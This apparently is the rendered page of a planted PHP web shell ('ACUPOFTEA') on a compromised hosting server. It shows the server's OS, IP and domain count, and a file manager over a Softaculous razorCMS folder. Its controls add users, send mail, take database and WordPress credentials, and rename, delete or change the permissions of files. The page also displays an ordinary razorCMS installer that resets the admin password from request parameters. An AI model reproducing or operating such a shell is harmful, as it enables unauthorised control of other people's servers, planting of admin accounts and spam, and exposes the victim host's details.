System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
razor
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
softaculous_install.php
<?php /** * razorCMS FBCMS Softaculous Installer * * Updates configuration in sqlite db based on GET/POST parameters and responds in a RESTful way. * Removes the ocnfiguration file once complete. RUN THIS FROM BASE INSTALL PATH! * * @param String GET/POST email - email address for the default user account * @param String GET/POST password - the password for the default user account * @param String/Bool GET/POST json - return json response * For GET json response - RAZOR_BASE_PATH/softaculous_install.php?json=true&email=razorcms@razorcms.co.uk&password=password * For GET raw html response - RAZOR_BASE_PATH/softaculous_install.php?email=razorcms@razorcms.co.uk&password= * * @return mixed (raw html or json) - The result of the install as a RESTful response (400 on error) with containing data * * Copywrite 2014 to Present Day - Paul Smith (aka smiffy6969, razorcms) * * @author Paul Smith * @site ulsmith.net * @created Jan 2015 */ // constants define("RAZOR_BASE_PATH", str_replace(array("softaculous_install.php"), "", $_SERVER["SCRIPT_FILENAME"])); define('RAZOR_PDO', 'sqlite:'.RAZOR_BASE_PATH.'storage/database/razorcms.sqlite'); // includes include_once(RAZOR_BASE_PATH.'library/php/razor/razor_file_tools.php'); include_once(RAZOR_BASE_PATH.'library/php/razor/razor_error_handler.php'); include_once(RAZOR_BASE_PATH.'library/php/razor/razor_site.php'); include_once(RAZOR_BASE_PATH."library/php/razor/razor_pdo.php"); include_once(RAZOR_BASE_PATH.'library/php/razor/razor_api.php'); // Load error handler $error = new RazorErrorHandler(); set_error_handler(array($error, 'handle_error')); set_exception_handler(array($error, 'handle_error')); ////////////////////////////////////////////// // update the sqlite db based on get params // ////////////////////////////////////////////// // first remove the this file unlink(__FILE__); // get query GET/POST data $json = (isset($_GET['json']) || isset($_POST['json']) ? 'json' : null); $email = (isset($_GET['email']) && !empty($_GET['email']) ? $_GET['email'] : (isset($_POST['email']) && !empty($_POST['email']) ? $_POST['email'] : null)); $password = (isset($_GET['password']) && !empty($_GET['password']) ? $_GET['password'] : (isset($_POST['password']) && !empty($_POST['password']) ? $_POST['password'] : null)); if (empty($email) || empty($password)) RazorAPI::response('email or password not set', $json, 400); // generate password $password = RazorAPI::create_hash($password); // update db $db = new RazorPDO(); $user = $db->edit_data('user', array('email_address' => $email, 'password' => $password), array('id' => 1), array('id')); // check update OK and return result if (empty($user)) RazorAPI::response('user not updated', $json, 400); else RazorAPI::response('User details updated', $json); /* PHP END */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
php53
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
php56
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
php71
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
php81
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
php82
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
upgrade
DIR
-
drwxr-xr-x
2025-03-29 09:40:34
check_suphp.php
text/x-php
96 B
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
3.6 KB
-rw-r--r--
2025-03-26 06:48:14
fileindex.php
text/plain
66 B
-rw-r--r--
2021-12-23 06:54:36
info.xml
text/html
2.85 KB
-rw-r--r--
2025-03-26 06:40:24
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
5.08 KB
-rw-r--r--
2025-03-26 06:48:14
install.xml
text/html
407 B
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
3.59 KB
-rw-r--r--
2025-03-26 06:48:14
notes.txt
text/plain
65 B
-rw-r--r--
2021-12-23 06:54:36
softaculous_install.php
text/x-php
2.75 KB
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
4.51 KB
-rw-r--r--
2025-03-26 06:48:14
upgrade.xml
text/plain
432 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com